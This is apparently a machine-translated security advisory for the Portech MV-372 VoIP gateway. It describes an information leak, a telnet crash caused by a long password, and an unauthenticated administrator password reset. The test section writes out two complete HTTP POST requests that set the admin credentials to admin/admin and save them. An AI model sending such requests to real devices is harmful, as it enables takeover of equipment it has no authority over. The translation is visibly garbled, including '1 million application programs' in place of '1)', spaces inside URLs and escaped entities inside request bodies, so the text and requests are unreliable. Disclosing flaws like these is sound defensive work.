Multiple security vulnerabilities in Portech MV-372 VoIP Gateway

Multiple security vulnerabilities in Portech MV-372 VoIP Gateway

Release date:
Updated on:

Affected Systems:
PORTech MV-372
Description:
--------------------------------------------------------------------------------
Bugtraq id: 48560

The MV-372 is a 2-channel VoIP GSM/CDMA/UMTS gateway for call terminals (VoIP to GSM/CDMA/UMTS to VoIP) and source (GSM/CDMA/UMTS to VoIP.

MV-372 has multiple security vulnerabilities in the implementation of VoIP gateway, remote attackers can exploit these vulnerabilities to obtain sensitive information, causing the affected device to crash or bypass certain security restrictions by sending specially crafted http post requests.

1 million application programs do not have limited access to info.htm, which can be exploited to leak sensitive information.

2) by providing a long password, errors in the telnet service can be exploited to cause service crash.

3) the authentication mechanism for managing the web interface does not properly restrict access to the password change function. You can change the administrator password by sending a special request to the web interface.

<* Source: Zsolt Imre
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

POST http: // <device address>/change. cgi HTTP/1.1
Host: & lt; device address & gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 5.0) Gecko/20100101
Firefox/5.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: hu-hu, hu; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2, UTF-8; q = 0.7, *; q = 0.7
Connection: keep-alive
Referer: http: // 192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

Nuser = admin & amp; Npass = admin & amp; Nrpass = admin & amp; submit = Submit

POST http: // & lt; device address & gt;/save. cgi
Host: & lt; device address & gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 5.0) Gecko/20100101
Firefox/5.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: hu-hu, hu; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2, UTF-8; q = 0.7, *; q = 0.7
Connection: keep-alive
Referer: http: // 192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

Submit = Save

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PORTech
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.portech.com.tw/p3-product1_1.asp? Pid = 14